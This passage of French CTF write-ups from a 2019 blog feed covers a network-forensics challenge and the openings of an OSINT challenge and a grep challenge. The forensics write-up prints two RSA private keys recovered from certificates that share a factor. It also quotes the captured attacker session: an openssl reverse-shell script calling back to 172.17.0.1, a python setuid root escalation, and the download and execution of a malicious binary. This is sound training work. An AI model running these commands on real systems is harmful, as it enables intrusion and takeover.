308203933082027ba00302010202147687e8f8299f8e13e23e4187ba389f139329e24d300d06092a864886f70d01010b05003059310b3009060355040613025255310f300d06035504080c06527573736965310f300d06035504070c064d6f73636f7731173015060355040a0c0e5072696d65206d696e6973746572310f300d060355040b0c06476f756c6167301e170d3139313032393233333631385a170d3238303131353233333631385a3059310b3009060355040613025255310f300d06035504080c06527573736965310f300d06035504070c064d6f73636f7731173015060355040a0c0e5072696d65206d696e6973746572310f300d060355040b0c06476f756c616730820122300d06092a864886f70d01010105000382010f003082010a0282010100f24eac4339289aa0a378e3c9d7489d630e4afc427f72b2c259c299cbbf61c8e8880076e73f789cadf783f12eea9dbe87c0cc8abeebb5acb90004ff115150a50e57f230a71930ef29f24823fb1b3cd85ccc241789884b2a486eadffcce9dbafd6d68aad196a5d7ab6da3b47998f4dc4c6eca879d6cd8207ee602a9eec007d581f3f07ba774c48f09cd13b6d17384412f92a1ab3076a6562bacd0ea868af98e8fd10600c6767406304a34f80f2864f1b39aae1dfa51364f10381425ca070d8ce82f8f766c2492d2b5645dbac3f324d2010ee43561d0c80f92e9841627d39aaf50829532f2a922fe3f32237db432617a5907abe2ab601697661705106fa2af2a7490203010001a3533051301d0603551d0e0416041403c8b22eff2cd0d1c0f6b84f7c7a8dd9b4019075301f0603551d2304183016801403c8b22eff2cd0d1c0f6b84f7c7a8dd9b4019075300f0603551d130101ff040530030101ff300d06092a864886f70d01010b05000382010100e1dbc5647cb3ef9bfa4e12e2412f3d81e943eddb350b3a938916b33e2c88ce5b8196633e52d9054a6eee5b47309c559167147426f8b2a34beebcd0e72bdcadbe9e73787635446200e45c67d0912d2c4004fa89bfe2bed7b0bf6739c0b6101129115275b10415d961f64eefd63bec93c143f88387125b3decdffff45bbf277f397bb3dbabe35b0c63e49ff5f7ab7c4551a03aec077bb699970cfebff9f7eb85ab7a13532f390a6a14fcac7e817648ac1b578d41448fa2b4bf1d6351573a49124f827d7638af621f0cb1679ad1f4fde6989aa2151cdec8e89eff04a92c3995d0a744e0de716a9d1f551e8f4d2c8290d53d6b8f2f354610e701bdce1846d607f6d5
3082039930820281a003020102021463d19310c368e05d63329abac451f4914f34da11300d06092a864886f70d01010b0500305c310b3009060355040613024652310f300d06035504080c064672616e6365310e300c06035504070c05506172697331173015060355040a0c0e5072696d65204d696e697374657231133011060355040b0c0a42726578697420465457301e170d3139313032393230313830315a170d3238303131353230313830315a305c310b3009060355040613024652310f300d06035504080c064672616e6365310e300c06035504070c05506172697331173015060355040a0c0e5072696d65204d696e697374657231133011060355040b0c0a4272657869742046545730820122300d06092a864886f70d01010105000382010f003082010a0282010100eaa1f50f799c7b8a48e346834c51c79d4f08f38394ecd091dca0f8a530ac92dcace9cb6139d67862747a6b7481204026a6af29ff7288f5f9903b8dc9263f8de2f58482c03c4b917709066d6caaf620bac25fc0576a989cbd81475d6979ebbc5619ea64aa3745040a82f0d76913de598590e9c334608f40c825105a289f5139d29ea3c6d86ad5d109d9bff90f42c3cadd927650b67261f09734eb551674469147914835066d3660e4c337a10d80fe7a567dce6357a11ac1fb061036ea074d5ba7062842173fd651ca2a708b4f4a885e5868b2f8e93807441c04210b855b394694a3a7a0bfd3297ed26c773fed7be3726c2949a7bb57c060a8b7a07006e2c818150203010001a3533051301d0603551d0e04160414762dcfdf0f4ac899c5ef67fc0db07aad8dd59c17301f0603551d23041830168014762dcfdf0f4ac899c5ef67fc0db07aad8dd59c17300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010001b9aee723c3b195a63bddcd6bc511b2383298467b231f3413b485d91be1bc1a9123bc222711b96c6ff7f45ce64288724b8eed1bdd00e7898940d610de82bc498db2fc11b3077f5c909c05ae651eb4279523ef1e457a67320539de71eec6a5b97932801b27cfb85544254cca8272644fc6e4736d79895e34d351d7aa537186230adecbae1c03ceab13df3991420b3349551f7c535b9ef0f62c07b713d072d42200bef377ee2caba61614e4fd9fdd6c2c613579ff08e99d2a5fd5707ca4aded732a12e211e9b5d382295f02ead6df2cec77b4b1e02cf7e67ef584fbb7c68334fd305bd46d63bb50ce265d5cf83e21b7c243e629b659d76c0b913357fb359c3529
</code></pre></div>
<p>On obtient ainsi des certificats au format héxadécimal. On les converti au format binaire avec la commande <code>xxd -r -p</code>.</p>
<p>On obtient ainsi trois certificats :</p>
<ul>
<li><code>Subject: C = FR, ST = France, L = Paris, O = Prime Minister, OU = Brexit FTW</code></li>
<li><code>Subject: C = RU, ST = Russie, L = Moscow, O = Prime minister, OU = Goulag</code></li>
<li><code>Subject: O =</code></li>
</ul>
<p>On peut éliminer le troisième qui ne contient aucune information utile pour nous.</p>
<p>Afin de pouvoir déchiffrer le flux TLS, il nous faut retrouver les clés privées associées à ces deux certificats. Déjà utilisé lors d'autres CTF, l'outil <code>RsaCtfTool</code> convient très bien pour faire ce travail. On le lance donc sur le premier certificat :</p>
<p>Hum, Rien trouvé. On le lance sur le second mais sans résultats non plus. En regardant la documentation, on voit que l'on peut lui donner plusieurs certificats publiques en même temps : <code>public key file. You can use wildcards for multiple keys.</code>.</p>
<p>On relance donc la commande avec les deux certificats en même temps et la réponse se fait quasiment instantanément :</p>
<div class="highlight"><pre><span></span><code>python RsaCtfTool.py --publickey <span class="s1">'certs/*.pem'</span> --private --verbose
<span class="o">[</span>*<span class="o">]</span> Multikey mode using keys: <span class="o">[</span><span class="s1">'certs/2.pem'</span>, <span class="s1">'certs/1.pem'</span><span class="o">]</span>
<span class="o">[</span>*<span class="o">]</span> Found common factor in modulus <span class="k">for</span> certs/2.pem and certs/1.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA8k6sQzkomqCjeOPJ10idYw5K/EJ/crLCWcKZy79hyOiIAHbn
P3icrfeD8S7qnb6HwMyKvuu1rLkABP8RUVClDlfyMKcZMO8p8kgj+xs82FzMJBeJ
iEsqSG6t/8zp26/W1oqtGWpderbaO0eZj03ExuyoedbNggfuYCqe7AB9WB8/B7p3
TEjwnNE7bRc4RBL5KhqzB2plYrrNDqhor5jo/RBgDGdnQGMEo0+A8oZPGzmq4d+l
E2TxA4FCXKBw2M6C+PdmwkktK1ZF26w/Mk0gEO5DVh0MgPkumEFifTmq9QgpUy8q
ki/j8yI320MmF6WQer4qtgFpdmFwUQb6KvKnSQIDAQABAoIBAHp/Y38oqmphw8Me
BbCcuVSWqToWtC/cR3zxcKccvebAB+GUOxxPcYZRl5aazWmqJR9HSO10ZIhJjsT3
3l1pk8hIldwa3hVrE5208tvDzWLkpx+n9pO8zEeKDNVBVwkFQGt9+DzdFR0wy+sk
K3HTMyQOCK5v9b1DHTPo2CcfqD6fsXW1cG3VfqlvT+iXyp9Z8hreA78MTEnfSzVW
g/UMUn1Y/ZjiO7l34JBm2Q0aiHBiRdBIatTDDw9uATrY491Ut/bRCWo9++iC7Kz0
t5jH28YynQp7upq2ZaLtb3QA/aggEdTN+jWs/EZSmdSY1JN2zUrPkJ81FR3vw+/z
paUe27ECgYEA9Qgo401V7TQhlP0XNKsWFuH6GwmZKEBBtXBF9nk26CbTZ+Er6SS0
tm3zYqUH+VkdnO+c//S/FmG/eSi3e4kB5dGsskzGzjjJzbtACenn1SRBUo0TfCZy
T6DMWXMDRvuOJEWYa8jCJ040qCSIbGYg9WoJ6+jn9jwtpIbZkqLS9pMCgYEA/SdK
0PMQ9UMOtW2PjPwCKF8uymRdh4KgfWufWmrsCTsHYqinKrF9FhxUeSNHN2qPmPnI
yW0LIvcVAzVA5c9weJgvqOfOigsBQaOcW0FqO8OswtGPyH3//dUIyB/vuZu5LYi4
93ECyON95PXpubDvgY4GJwM0Lo9vpdaqt/nTWDMCgYBLWUQBidGHjMVa5G0TZBz5
0mmvkMcJKqFKIwlQnru0rePKiOKQ4hm0E6GJTwhhs/a4QLK9vsxYHJzdrBioI1xz
CIQbnCJyXeIoopExuzzwPSLdOMaqIcR7Gg5c31I9rLNsEf6p/mU94v2sSvespccy
0HXWlptmC+FZO6KCRhGrgwKBgBQETVgkQA0Ell8mIJmnO4xxqkN6mCKk44fHQLxn
g+5e6oCUkVNA4YEkEFHbxj/Nfzk7VvMGWkEThGfSiCUjt+LxNaOHYL9ti1XjV/On
Qn0jRb/JzjKuM9WgSKd6TvxAIe5Fx0pZdzznMAcwoqB6KxX1Yusmx7N+x/c2+By/
9kQdAoGAYxsY9EhchdDsUy5f2DrsQIeCQJueLexVVxebo4rpgb7NCybqqI55qbjd
2CMdY+8Fw74L2zxwgFDgngrIHsjIMqUNp64pgp+4qqjN+ix0ue86ZTlnaqgK3uaw
DDlBMgDIvOc+FYcy1aeqpCQHi8R1EIjlqZGvlV8wTwv9dJ+N/ug<span class="o">=</span>
-----END RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA6qH1D3mce4pI40aDTFHHnU8I84OU7NCR3KD4pTCsktys6cth
OdZ4YnR6a3SBIEAmpq8p/3KI9fmQO43JJj+N4vWEgsA8S5F3CQZtbKr2ILrCX8BX
apicvYFHXWl567xWGepkqjdFBAqC8NdpE95ZhZDpwzRgj0DIJRBaKJ9ROdKeo8bY
atXRCdm/+Q9Cw8rdknZQtnJh8Jc061UWdEaRR5FINQZtNmDkwzehDYD+elZ9zmNX
oRrB+wYQNuoHTVunBihCFz/WUcoqcItPSoheWGiy+Ok4B0QcBCELhVs5RpSjp6C/
0yl+0mx3P+1743JsKUmnu1fAYKi3oHAG4sgYFQIDAQABAoIBAGmSVeGQpogvwHwC
zjEY2ug9F5n6KpgjgH31L+uj6wJpqKPJjwWnKqOiJTMUSMVqF/oH9q2pq1aB5BPn
yAodrongTq9GL9sQqK625aVvhy9S2QKcWLjt0hiygpnVS7Z2F4exn3m3RKZ81E3p
nq4B7eXbPlNGzeunCmci5G5CwRlyfsGxNlpFy6pcdytGwCt9+WRS36Yrc8jZQm8x
qiyA93pTAYBt3Hb0/edpKj6e9dbGIi3YMPpL0TpF63+629uSpP1mW9A2IMVP+I8N
nBIwxpazruhla/TOOF8nlUTiLtZc5fSnNCgprMXFYmBlB+DCVarS+VD2mqx+ugzm
DxUtekECgYEA9Qgo401V7TQhlP0XNKsWFuH6GwmZKEBBtXBF9nk26CbTZ+Er6SS0
tm3zYqUH+VkdnO+c//S/FmG/eSi3e4kB5dGsskzGzjjJzbtACenn1SRBUo0TfCZy
T6DMWXMDRvuOJEWYa8jCJ040qCSIbGYg9WoJ6+jn9jwtpIbZkqLS9pMCgYEA9SKh
xuY/zb9sl0MbGTB5j4ZKcpNVLh9YCgiRDsXDpUeLNmsOWqJCS0Gep+hSyGEDmbeD
ijZ02c0GXccpjjYgPltqiREE5j6jUKHLPm8ZuQ+Ia/v6yJGOUMlJZ+14I86+TKtm
AxCsVZOeHEmV4gSFos3l063n1ywtgmZmkS7m97cCgYBLWUQBidGHjMVa5G0TZBz5
0mmvkMcJKqFKIwlQnru0rePKiOKQ4hm0E6GJTwhhs/a4QLK9vsxYHJzdrBioI1xz
CIQbnCJyXeIoopExuzzwPSLdOMaqIcR7Gg5c31I9rLNsEf6p/mU94v2sSvespccy
0HXWlptmC+FZO6KCRhGrgwKBgF3QMCuHiJl8Ddnhs6gzNgJoeWtZ2Tp6gl3so18M
7m/9bliYJfknqclVRpupvKy0/ATDB5NIffWwkiQniU7Ehhh3MdFc8wwOor/D+51c
NXLub94ro/FISze9oNsmNVk20PtUiQjZQ6rIgLUAsFy8MEx7Ed6t6lEdthj2iYA8
e+YHAoGBALUVvWU6bh85o86amHzSK8tuHrEXthrzHn6xDwrKNpFFNqL6lepCVKx0
pH7Ul9V489IRNsOHtKyHewJXyJAsRJrP6c7veE49kjBrIkXHjCf8zhuiqtPdpE1V
LIXge+kDK5K/FLJN+jtrapJ1DHtuAwsrxD8e4/aB6eGiSsSFMRXU
-----END RSA PRIVATE KEY-----
</code></pre></div>
<p>Bingo ! On a donc, dans l'ordre, la clé pour le second certificat et le premier. On peut facilement valdier l'ensemble en vérifier le modulus de chacun :</p>
<div class="highlight"><pre><span></span><code>$ openssl x509 -inform der -in <span class="m">2</span>.pem -modulus --noout
<span class="nv">Modulus</span><span class="o">=</span>F24EAC4339289AA0A378E3C9D7489D630E4AFC427F72B2C259C299CBBF61C8E8880076E73F789CADF783F12EEA9DBE87C0CC8ABEEBB5ACB90004FF115150A50E57F230A71930EF29F24823FB1B3CD85CCC241789884B2A486EADFFCCE9DBAFD6D68AAD196A5D7AB6DA3B47998F4DC4C6ECA879D6CD8207EE602A9EEC007D581F3F07BA774C48F09CD13B6D17384412F92A1AB3076A6562BACD0EA868AF98E8FD10600C6767406304A34F80F2864F1B39AAE1DFA51364F10381425CA070D8CE82F8F766C2492D2B5645DBAC3F324D2010EE43561D0C80F92E9841627D39AAF50829532F2A922FE3F32237DB432617A5907ABE2AB601697661705106FA2AF2A749
$ openssl rsa -in <span class="m">2</span>.key -modulus --noout
<span class="nv">Modulus</span><span class="o">=</span>F24EAC4339289AA0A378E3C9D7489D630E4AFC427F72B2C259C299CBBF61C8E8880076E73F789CADF783F12EEA9DBE87C0CC8ABEEBB5ACB90004FF115150A50E57F230A71930EF29F24823FB1B3CD85CCC241789884B2A486EADFFCCE9DBAFD6D68AAD196A5D7AB6DA3B47998F4DC4C6ECA879D6CD8207EE602A9EEC007D581F3F07BA774C48F09CD13B6D17384412F92A1AB3076A6562BACD0EA868AF98E8FD10600C6767406304A34F80F2864F1B39AAE1DFA51364F10381425CA070D8CE82F8F766C2492D2B5645DBAC3F324D2010EE43561D0C80F92E9841627D39AAF50829532F2A922FE3F32237DB432617A5907ABE2AB601697661705106FA2AF2A749
</code></pre></div>
<p>On peut donc utiliser nos deux clés ainsi obtenues dans Wireshark pour décoder l'ensemble des échanges TLS.</p>
<h2>Analyse TLS</h2>
<p>On peut maintenant voir le contenu des requêtes en clair.</p>
<p>La première a apparaitre est la suivant (<code>tcp.stream eq 85667</code>) :</p>
<div class="highlight"><pre><span></span><code><span class="nf">GET</span> <span class="nn">/a.sh</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l">172.17.0.1</span>
<span class="na">User-Agent</span><span class="o">:</span> <span class="l">curl/7.64.0</span>
<span class="na">Accept</span><span class="o">:</span> <span class="l">*/*</span>
</code></pre></div>
<p>Il s'agit d'un script bash permettant l'ouverture d'un reverse shell chiffré sur la machine cible :</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/sh</span>
<span class="nv">IP_ATTACKER</span><span class="o">=</span><span class="s2">"172.17.0.1"</span>
<span class="nv">OPENSSL_PATH</span><span class="o">=</span><span class="k">$(</span>which openssl<span class="k">)</span>
wget --no-check-certificate https://<span class="si">${</span><span class="nv">IP_ATTACKER</span><span class="si">}</span>:443/cert2.crt -O /dev/shm/cert.pem
mkfifo /tmp/s<span class="p">;</span> /bin/sh -i < /tmp/s <span class="m">2</span>><span class="p">&</span><span class="m">1</span> <span class="p">|</span> <span class="si">${</span><span class="nv">OPENSSL_PATH</span><span class="si">}</span> s_client -quiet -CAfile /dev/shm/cert.pem -verify_return_error -verify <span class="m">1</span> -connect <span class="si">${</span><span class="nv">IP_ATTACKER</span><span class="si">}</span>:8443 > /tmp/s<span class="p">;</span> rm /tmp/s
</code></pre></div>
<p>La deuxième requête (<code>tcp.stream eq 85669</code>) correspond à l'ensemble des actions faites par l'attaquant au travers du reverse shell créé juste avant :</p>
<p>Il y récupère le script <code>LinEnum.sh</code> (<code>wget --no-check-certificate https://172.17.0.1/LinEnum.sh</code>). Cela lui permet de faire de la reconnaissance sur le système cible. Mais cela ne constitue pas en soit l'attaque recherché pour notre flag.</p>
<p>On poursuit donc les commandes exécutées et on arrive à une partie très intéressante :</p>
<div class="highlight"><pre><span></span><code>www-data@d58feef475e4:/tmp$ /usr/bin/python2.7 -c <span class="s1">'import os; os.setuid(0); os.system("/bin/sh")'</span>
< -c <span class="s1">'import os; os.setuid(0); os.system("/bin/sh")'</span>
root@d58feef475e4:# id
id
<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">33</span><span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">33</span><span class="o">(</span>www-data<span class="o">)</span>
root@d58feef475e4:# <span class="nb">cd</span> /root
root@d58feef475e4:# <span class="nb">cd</span> /root
root@d58feef475e4:# ls -la
total <span class="m">20</span>
drwx------ <span class="m">1</span> root root <span class="m">4096</span> Nov <span class="m">20</span> <span class="m">21</span>:37 .
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Nov <span class="m">20</span> <span class="m">21</span>:51 ..
-rw-r--r-- <span class="m">1</span> root root <span class="m">570</span> Jan <span class="m">31</span> <span class="m">2010</span> .bashrc
-rw-r--r-- <span class="m">1</span> root root <span class="m">148</span> Aug <span class="m">17</span> <span class="m">2015</span> .profile
-r-------- <span class="m">1</span> root root <span class="m">28</span> Nov <span class="m">20</span> <span class="m">21</span>:36 flag
root@d58feef475e4:# wc -c flag
<span class="m">28</span> flag
root@d58feef475e4:# stat flag
File: flag
Size: <span class="m">28</span> Blocks: <span class="m">8</span> IO Block: <span class="m">4096</span> regular file
Device: 78h/120d Inode: <span class="m">6206622</span> Links: <span class="m">1</span>
Access: <span class="o">(</span><span class="m">0400</span>/-r--------<span class="o">)</span> Uid: <span class="o">(</span> <span class="m">0</span>/ root<span class="o">)</span> Gid: <span class="o">(</span> <span class="m">0</span>/ root<span class="o">)</span>
Access: <span class="m">2019</span>-11-20 <span class="m">21</span>:36:58.000000000 +0000
Modify: <span class="m">2019</span>-11-20 <span class="m">21</span>:36:58.000000000 +0000
Change: <span class="m">2019</span>-11-20 <span class="m">21</span>:38:07.737200347 +0000
Birth: -
root@d58feef475e4:# <span class="nb">echo</span> -n <span class="s1">'Il y a le flag dans le /root'</span>
Il y a le flag dans le /root#
root@d58feef475e4:# <span class="nb">cd</span> /usr/local/bin
<span class="nb">cd</span> /usr/local/bin
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# ls
apache2-foreground docker-php-ext-install peardev php
docker-php-entrypoint docker-php-source pecl php-config
docker-php-ext-configure freetype-config phar phpdbg
docker-php-ext-enable pear phar.phar phpize
root@d58feef475e4:# wget --no-check-certificate https://172.17.0.1/DRUNK_IKEBANA -O phar.bak
--2019-11-20 <span class="m">22</span>:03:12-- https://172.17.0.1/DRUNK_IKEBANA
Connecting to <span class="m">172</span>.17.0.1:443... connected.
WARNING: The certificate of <span class="s1">'172.17.0.1'</span> is not trusted.
WARNING: The certificate of <span class="s1">'172.17.0.1'</span> doesn<span class="s1">'t have a known issuer.</span>
<span class="s1">The certificate'</span>s owner does not match hostname <span class="s1">'172.17.0.1'</span>
HTTP request sent, awaiting response... <span class="m">200</span> OK
Length: <span class="m">7634240</span> <span class="o">(</span><span class="m">7</span>.3M<span class="o">)</span> <span class="o">[</span>application/octet-stream<span class="o">]</span>
Saving to: <span class="s1">'phar.bak'</span>
phar.bak <span class="m">0</span>%<span class="o">[</span> <span class="o">]</span> <span class="m">0</span> --.-KB/s
phar.bak <span class="m">100</span>%<span class="o">[===================</span>><span class="o">]</span> <span class="m">7</span>.28M --.-KB/s in <span class="m">0</span>.05s
<span class="m">2019</span>-11-20 <span class="m">22</span>:03:12 <span class="o">(</span><span class="m">146</span> MB/s<span class="o">)</span> - <span class="s1">'phar.bak'</span> saved <span class="o">[</span><span class="m">7634240</span>/7634240<span class="o">]</span>
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# ls -la
total <span class="m">35168</span>
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Nov <span class="m">20</span> <span class="m">22</span>:03 .
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Oct <span class="m">25</span> <span class="m">02</span>:29 ..
-rwxrwxr-x <span class="m">1</span> root root <span class="m">1346</span> Oct <span class="m">25</span> <span class="m">02</span>:26 apache2-foreground
<span class="o">[</span>...<span class="o">]</span>
lrwxrwxrwx <span class="m">1</span> root root <span class="m">9</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar -> phar.phar
-rw-r--r-- <span class="m">1</span> root www-data <span class="m">7634240</span> Nov <span class="m">20</span> <span class="m">22</span>:02 phar.bak
-rwxr-xr-x <span class="m">1</span> root root <span class="m">14817</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar.phar
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# chmod +x phar.bak
root@d58feef475e4:# ls -la
<span class="o">[</span>...<span class="o">]</span>
lrwxrwxrwx <span class="m">1</span> root root <span class="m">9</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar -> phar.phar
-rwxr-xr-x <span class="m">1</span> root www-data <span class="m">7634240</span> Nov <span class="m">20</span> <span class="m">22</span>:02 phar.bak
-rwxr-xr-x <span class="m">1</span> root root <span class="m">14817</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar.phar
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# ./phar.bak <span class="p">&</span>
</code></pre></div>
<p>Au travers de la commande <code>python</code>, il arrive à passer en utilisateur <code>root</code>. Cela lui permet de s'échapper de <code>www-data</code> et gagner des privilèges sur l'ensemble du système.</p>
<p>On voit la création d'un fichier <code>flag</code> mais, comme son tenu l'indique, il n'y a rien dedans. Dommage :(. Juste après cela, il se place dans le dossier <code>/usr/bin</code> et en liste le contenu. Et c'est la qu'il récupère le fichier malicieux : <code>phar.bak</code>. Son action est inconnue mais il le lance en tâche de fond via l'opérateur <code>&</code>.</p>
<p>Il faut donc réussir à extraire de la capture Wireshark cet objet.</p>
<h2>Export des objets</h2>
<p>La commande <code>tshark</code> nous permet l'extraction de l'ensemble des objets HTTP présents dans une capture. Comme un partie est en TLS, il faut lui indiquer la correspondance : adresse IP, protocole, clé privée.</p>
<div class="highlight"><pre><span></span><code>$ tshark -r ../challenge.pcapng -o <span class="s2">"tls.keys_list: 172.17.0.5,443,http,1.key;172.17.0.1,443,http,1.key;172.17.0.1,443,http,2.key;172.17.0.5,443,http,2.key"</span> --export-objects <span class="s2">"http,export_http"</span> -Y <span class="s2">"http && tcp.stream eq 85672"</span>
<span class="m">184118</span> <span class="m">544</span>.690600279 <span class="m">172</span>.17.0.5 → <span class="m">172</span>.17.0.1 HTTP <span class="m">245</span> GET /DRUNK_IKEBANA HTTP/1.1 <span class="m">245</span>
<span class="m">185446</span> <span class="m">544</span>.740615854 <span class="m">172</span>.17.0.1 → <span class="m">172</span>.17.0.5 HTTP <span class="m">1324</span> HTTP/1.0 <span class="m">200</span> OK <span class="m">1324</span>
</code></pre></div>
<p>On récupère alors l'ensemble des objets HTTP dans le dossier <code>export_http</code> :</p>
<div class="highlight"><pre><span></span><code>$ ls export_http -al <span class="p">|</span> wc -l
<span class="m">4696</span>
$ ls -lh export_http/DRUNK_IKEBANA
-rw-r--r-- <span class="m">1</span> nlegall nlegall <span class="m">7634240</span> déc. <span class="m">26</span> <span class="m">13</span>:04 export_http/DRUNK_IKEBANA
$ file export_http/DRUNK_IKEBANA
export_http/DRUNK_IKEBANA: ELF <span class="m">64</span>-bit LSB executable, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, stripped
</code></pre></div>
<p>Parfait ! La taille du fichier extrait correspond à celui télécharger par l'attaquant et semble être bien extrait. Un SHA256 dessus et c'est le flag :</p>
<div class="highlight"><pre><span></span><code>$ sha256sum export_http/DRUNK_IKEBANA <span class="p">|</span> sed -E <span class="s1">'s/^(.)/SANTA{\1/'</span> <span class="p">|</span> sed -E <span class="s1">'s/ (.*)/}/'</span>
SANTA<span class="o">{</span>daeb4a85965e61870a90d40737c4f97d42ec89c1ece1c9b77e44e6749a88d830<span class="o">}</span>
</code></pre></div>
<p>Merci à Maki pour la création de ce challenge. Il fut très intéressant et instructif :).</p>
<h3>PS</h3>
<p>Il faut bien mettre <code>HTTP</code> dans le protocole TLS et non <code>TLS</code>. J'avais fait l'erreur et cela m'a coûté 3 heures de temps. J'avais bien les trames de décodés et l'affichage possible des échanges (comme les trois trames indiquées plus haut).</p>
<p>Cependant, il était impossible d'avoir le binaire extrait au complet. Seul les deux premiers ko du fichier était extraits. Une erreur à ne plus faire :p.</p>Santhacklaus 2019 - Call me if you can (1)2019-12-24T00:00:00+01:002019-12-24T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-24:/santhacklaus-2019-call-me-if-you-can-1.html<div class="highlight"><pre><span></span><code>You have been contracted to get information on a target.
You need to find his number first
Everything you need is in the investigation folder. You don't need to go online.
Flags is SANTA{+33XXXXXXXXX}. Just replace the X's with the numbers you'll find. Once you find …</code></pre></div><div class="highlight"><pre><span></span><code>You have been contracted to get information on a target.
You need to find his number first
Everything you need is in the investigation folder. You don't need to go online.
Flags is SANTA{+33XXXXXXXXX}. Just replace the X's with the numbers you'll find. Once you find the number, don't call it, you will unlock another challenger with further instructions.
Investigation File is here . MD5 is bd9d36c7f1fa8eca9bc096e9525a5a1c.
</code></pre></div>
<p>Une archive avec un ensemble de fichier nous est fournie. On l'extrait pour obtenir un ensemble de fichiers :</p>
<div class="highlight"><pre><span></span><code>├── Dropsbox
│ ├── 3c9f1550bfa66f48d82d166f978bc2f8.pdf
│ ├── 5ae51f9bf48ddc082fdb83f3f1bf612c.pdf
│ ├── 79bc419ba71c464f77986eb60a3e9fdd.pdf
│ ├── 7a551750a648d3059d2385d5058cea7e.pdf
│ ├── 8a4e1425767cfce6d967f6399ffbceba.pdf
│ ├── 9e444b0fc8b937cfc58fcd1a6280d04d.pdf
│ ├── 9fd9d47270bbc75f765835a435f0e5fb.pdf
│ ├── b18bc307d0a5911a15eadfb83d8b0504.pdf
│ ├── ce8b5773ede1293b7eefffea757f737f.png
│ ├── dd0d83c7c7b310693fb4a16fc9035fb7.pdf
│ ├── ea062527cb24d8663b6819d2893b121a.pdf
│ ├── f762754554211647b663b152ab080530.pdf
│ ├── f82645294cae45d53c980ea24440f6c3.ods
│ └── fe18010c71ea1fb5a62bd703e976afb8.pdf
├── Keylog <span class="p">&</span> recordings
│ ├── 29488780488a0b6a06f7fd491fe5c021.m4a
│ └── a57227ea3f4eb6de8120cf30ac26846c.log
└── Social Networks
├── Fakebook
│ ├── 0a92f64b25e17202d295e1920fbe88fd.jpeg
│ ├── 1197587d9d8d5428ba7b525a508956b1.jpg
│ ├── 12e92b9e8254f7ff73345d12ff7268ce.jpg
│ ├── 32dbd552b8a967fdb25910184c37e4d4.jpg
│ ├── 84057b704fc6a4508b4b3446b8388d94.mp4
│ ├── c1c59af2a8e1c0e4f9555533247329c3.jpg
│ ├── ddeca591b56beffc614ce06224bf0719.jpg
│ ├── dfc5a9210294315fc1da2b757eee6d01.jpg
│ └── ed3294264398b6198a0e47f5054277e4.mp4
├── Linksin
│ └── cfbdeeeba7cfc77865d45ece99eea764.png
└── Minigram
├── 015ac39aa27e6120084ef181347c5555.jpg
├── 0524717ac2e5b851e4b0a2090b0321f8.jpg
├── 09a358531af60558f35e4b3a430f68bf.jpg
├── 379df76c0534ea4671224645234bc98d.jpg
├── 5688d7aa42462ea07cf682f559d5e51b.jpg
├── 637e886323fa832f014f6d2f69543628.jpg
├── 8d4cd3519b6cb3013052f34a5604c6b9.jpg
├── ade67625ccdd3549d61fea5d30a239ed.jpg
├── bad8de4e45a76be9e764adf58c7d7572.jpg
└── f6016d5a8d4a94761268f5f27056c64e.jpg
<span class="m">6</span> directories, <span class="m">36</span> files
</code></pre></div>
<p>On sait que l'on doit trouver un numéro de téléphone. En parcourrant les images, on trouve cette image :</p>
<p><img alt="callme1" src="https://blog.nlegall.fr/images/santhacklaus/callme1.jpg"></p>
<p>Hum. Du texte masqué au noir et ça parle de <code>number</code>... On peut donc essayer de trouver ce qui est caché. On ouvre l'image avec Gimp, on inverse les couleurs (négatif) et on change contraste et saturation pour obtenir ceci :</p>
<p><img alt="callme2" src="https://blog.nlegall.fr/images/santhacklaus/callme2.jpg"></p>
<p>On voit alors le premier numéro de téléphone : <code>+33634863367</code>. Cependant, une correction y est apportée : <code>+33634683367</code>.</p>
<p>Le flag est donc : <code>SANTA{+33634683367}</code>. Cela nous permet d'avoir la deuxième partie et 150 points.</p>Santhacklaus 2019 - Grepepe2019-12-24T00:00:00+01:002019-12-24T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-24:/santhacklaus-2019-grepepe.html<div class="highlight"><pre><span></span><code>Do you know grep ? Regex ? Well you should. It's very useful, especially during CTFs. Remember the flag is something like SANTA{fl4g_f0rmAT}.
MD5 : 6c4299aaa7c7da7250f647e3665fb7a6
</code></pre></div>
<p>L'ennoncé donne la technique à utilisé : <code>grep</code>. J'ai pris <code>rg</code> (ripgrep) qui fait la même chose que grep globalement. On le lance en indiquant que …</p><div class="highlight"><pre><span></span><code>Do you know grep ? Regex ? Well you should. It's very useful, especially during CTFs. Remember the flag is something like SANTA{fl4g_f0rmAT}.
MD5 : 6c4299aaa7c7da7250f647e3665fb7a6
</code></pre></div>
<p>L'ennoncé donne la technique à utilisé : <code>grep</code>. J'ai pris <code>rg</code> (ripgrep) qui fait la même chose que grep globalement. On le lance en indiquant que l'on cherche <code>SANTA{</code> :</p>
<div class="highlight"><pre><span></span><code>$ rg <span class="s1">'SANTA\{'</span> flag.txt
